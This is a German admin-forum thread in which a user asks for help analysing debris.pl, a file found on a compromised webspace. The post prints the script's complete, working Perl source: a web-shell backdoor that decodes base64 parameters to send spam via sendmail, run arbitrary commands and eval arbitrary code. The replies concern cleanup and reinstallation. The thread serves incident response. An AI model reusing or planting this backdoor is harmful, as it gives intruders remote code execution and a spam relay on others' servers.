Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Frage Sicherheit Erkennung und -Abwehr

GELÖST

Analyse von Schadcode auf Webspace

Mitglied: mercuric

mercuric (Level 1) - Jetzt verbinden

16.07.2014, aktualisiert 22:09 Uhr, 1376 Aufrufe, 6 Kommentare

Moin,
ich habe gerade die Anfrage bekommen mir einen Webspace anzusehen, dessen Betreiber ein Abuse-Warning vom Provider bekommen hat.
Ich habe im Webverzeichnis unter /www/cgi-bin/ die Datei debris.pl mit folgenden Inhalt gefunden
(hab es leider nicht vernünftig formatiert bekommen)

01.
#!/usr/bin/perl -w 
02.
use strict;sub b ($) {local($^W)=0;use integer;my $s=shift;$s=~tr|A-Za-z0-9+=/||cd;return "" if length($s) % 4;$s=~s/=+$//;$s=~tr|A-Za-z0-9+/| -_|;return "" if !length $s;my $u="";my($i,$l);$l=length($s)-60;for($i=0;$i<=$l;$i+=60){$u.="M".substr($s,$i,60);}$s=substr($s,$i);if($s ne ""){$u.=chr(32+length($s)*3/4).$s;}return unpack("u",$u);}sub m {my $r=30128+256;my $q={};my $s="";if($ENV{REQUEST_METHOD} eq "GET"){$s=$ENV{QUERY_STRING};}else{my $l=$ENV{CONTENT_LENGTH};exit unless $l;while($l > length $s){my $v=length $s;sysread(STDIN,$s,($l-$v),$v);}}foreach(split(/&/,$s)){my($k,$v)=split(/=/,$_,2);next if !defined $k || !length $k;$v="" if !defined $v;$v=~tr/+/ /;$v=~s/%([0-9A-Fa-f]{2})/chr(hex($1))/esg;$q->{$k}=$v;}print "Content-type: text/html; charset=iso-8859-1\x0D\x0A\x0D\x0A";if($q->{m}==0){print $r;exit;}if($q->{m}==1){if(open(M,"| /usr/sbin/sendmail -t > /dev/null")){print M sprintf("To: %s\x0D\x0ASubject: %s\x0D\x0A%s",&b($q->{a}),&b($q->{b}),&b($q->{c}));close M;print $r;}exit;}if($q->{m}==2){use IPC::Open2 qw(open2);local $SIG{PIPE}=sub {exit};my($o,$i);my $p=open2 $o,$i,&b($q->{a});print $i &b($q->{b});close $i;print while(<$o>);close $o;waitpid($p,0);exit;}if($q->{m}==3){eval(&b($q->{a}));exit;}}&m();
Hab jetzt noch nicht so viele Perl Skripte gesehen, aber es sieht für mich aus, als würden damit (Spam)-Mails verschickt.
Liege ich da mit richtig? Kann mir noch jemand mehr dazu sagen?
In den Logfiles ist zu sehen, dass auf die Datei regelmäßig von IP-Adressen aus verschieden Ländern zugegriffen wurde.
Würdet Ihr sagen, dass es reicht das Skript zu entfernen (und natürlich alles Login Daten zu ändern) oder gibt es in dem Code Hinweise, dass es noch mehr korrupte Files gibt?

Vielen Dank für eure Mühe
mercuric
Mitglied: colinardo
LÖSUNG 16.07.2014, aktualisiert um 22:09 Uhr
Hallo mercuric,
da haben die sich ein Rootkit eingefangen. Hatte vor ein paar Tagen ein ähnliches System das komplett kompromittiert war (OpenSSH Sicherheitslücke). Bei diesem System wurden diverse Veränderungen vorgenommen um den Server auch nach einem Reboot immer wieder zu infizieren.

Neuinstallation ist in diesem Fall unbedingt anzuraten !

Hier noch ein Link dazu:
http://security.stackexchange.com/questions/10202/perl-script-rootkit-e ...

Wenn es ein Managed Server ist, ist vermutlich nur die Seite bzw. das CMS infiziert. Hier sind dann sämtliche Seiten auf Veränderungen zu überprüfen, oder auch dieses neu einzuspielen.

Grüße Uwe
Bitte warten ..
Mitglied: mercuric
16.07.2014 um 21:48 Uhr
Vielen Dank für deine schnelle Antwort, dass ja schon mal sehr spannend.
Es handelt sich lediglich um Webspace, sprich FTP, MySQL und Mail Zugang nicht um einen Root-Server (1blu-Homepage Professional).
Auf dem Space liegen nur reine HTML-Files, die auf dem ersten Blick sauber aussehen und Images/PDFs.
Ist es auch möglich so einem abgeschotteten System weiter zu kompromittieren?
Bitte warten ..
Mitglied: colinardo
16.07.2014, aktualisiert um 22:12 Uhr
Wenn nicht alle Sicherheitspatches eingespielt wurden oder eine Erweiterung des Hosters Sicherheitslücken aufweist, kann das schon mal sein, zwar selten, aber nicht unmöglich. Checke trotzdem alle Seiten auch auf komprimiertes JavaScript.
http://www.administrator.de/forum/opera-browser-warnung-vor-einer-b&oum ...
Bitte warten ..
Mitglied: certifiedit.net
16.07.2014 um 22:11 Uhr
..und kontaktiere den Hoster.
Bitte warten ..
Mitglied: LordGurke
17.07.2014 um 21:06 Uhr
Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
Bitte warten ..
Mitglied: colinardo
17.07.2014, aktualisiert um 21:09 Uhr
Zitat von LordGurke:

Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
hab nicht gesagt das die aktuell war der Betreiber hat das betroffene System ziemlich vernachlässigt...
Bitte warten ..
Ähnliche Inhalte
Sicherheit
Sicherheitsupdate: Thunderbird als Einfallstor für Schadcode
Information von Penny.CilinSicherheit

Hallo zusammen, wer Mozillas Thunderbird benutzt, sollte dringend aktualisieren: Sicherheitsupdate: Thunderbird als Einfallstor für Schadcode Siehe dazu auch Gruss ...

Webentwicklung
Webspace Ranking
Frage von malikaWebentwicklung5 Kommentare

Guten Tag, ich habe heute mit einem Webentwickler gesprochen und er meinte, wenn eine Website in Russland besseren Ranking ...

Exchange Server
Mailverfolgung und Analyse
gelöst Frage von Philipp711Exchange Server3 Kommentare

Hallo Leute, wie Verfolge ich am Besten den Mailversand/Mailempfang auf einem Exchange 2010? Kann ich irgendwo nachschauen ob eine ...

LAN, WAN, Wireless
Netzwerk Analyse
gelöst Frage von TooobiiLAN, WAN, Wireless9 Kommentare

Hallo, ich interessiere mich sehr über WLAN und allgemein über Netzwerke, kenne mich allerdings nur in ein paar wenigen ...

Neue Wissensbeiträge
Microsoft

Letzte Updates für Win10 und Server2016 müssen bei Bedarf über den Update catalogue in den WSUS importiert werden!

Tipp von DerWoWusste vor 2 StundenMicrosoft1 Kommentar

automatisch kommt da nichts an im WSUS und auch nicht im SCCM. Siehe Hinweise zum Bezug der jeweils neuesten ...

Linux

Meltdown und Spectre: Linux Update

Information von Frank vor 2 TagenLinux

Meltdown (Variante 3 des Prozessorfehlers) Der Kernel 4.14.13 mit den Page-Table-Isolation-Code (PTI) ist nun für Fedora freigegeben worden. Er ...

Tipps & Tricks

Solutio Charly Updater Fehlermeldung: Das Abgleichen der Dateien in -Pfad- mit dem Datenobject ist fehlgeschlagen

Tipp von StefanKittel vor 3 TagenTipps & Tricks

Hallo, hier einmal als Tipp für alle unter Euch die mit der Zahnarztabrechnungssoftware Charly von Solutio zu tun haben. ...

Sicherheit

Meltdown und Spectre: Wir brauchen eine "Abwrackprämie", die die CPU-Hersteller bezahlen

Information von Frank vor 3 TagenSicherheit13 Kommentare

Zum aktuellen Thema Meltdown und Spectre: Ich wünsche mir von den CPU-Herstellern wie Intel, AMD oder ARM eine Art ...

Heiß diskutierte Inhalte
Firewall
Penetrationstester-Labor - Firewalls
Frage von Oli-nuxFirewall10 Kommentare

Mich würde interessieren warum man beim Einrichten eines Penetrationstester-Labor (VMs) die Firewall der Systeme deaktivieren soll? Hat das nur ...

SAN, NAS, DAS
Wer kennt sich mit QNAP und CISCO aus ?
gelöst Frage von MachelloSAN, NAS, DAS9 Kommentare

Hallo Zusammen hier im Forum, Ich habe ein QNas 451+ und dieses NAS hat zwei GBit Lan Adapter die ...

Netzwerkgrundlagen
IPv6 Inter-VLAN Routing
gelöst Frage von clSchakNetzwerkgrundlagen9 Kommentare

Hi ich befasse mich gerade mit der Implementierung von IPv6 was bisher (in einem VLAN) korrekt funktioniert inkl. DNS ...

Windows Netzwerk
Ist ein Portforwarding auf einen PC ohne lauschendes Programm ein (großes) Sicherheitsproblem?
Frage von PluwimWindows Netzwerk8 Kommentare

Hallo zusammen, zur Fernwartung eines Rechners an einem anderen Ort nutze ich VNC. Da dieser Rechner einfach nur eine ...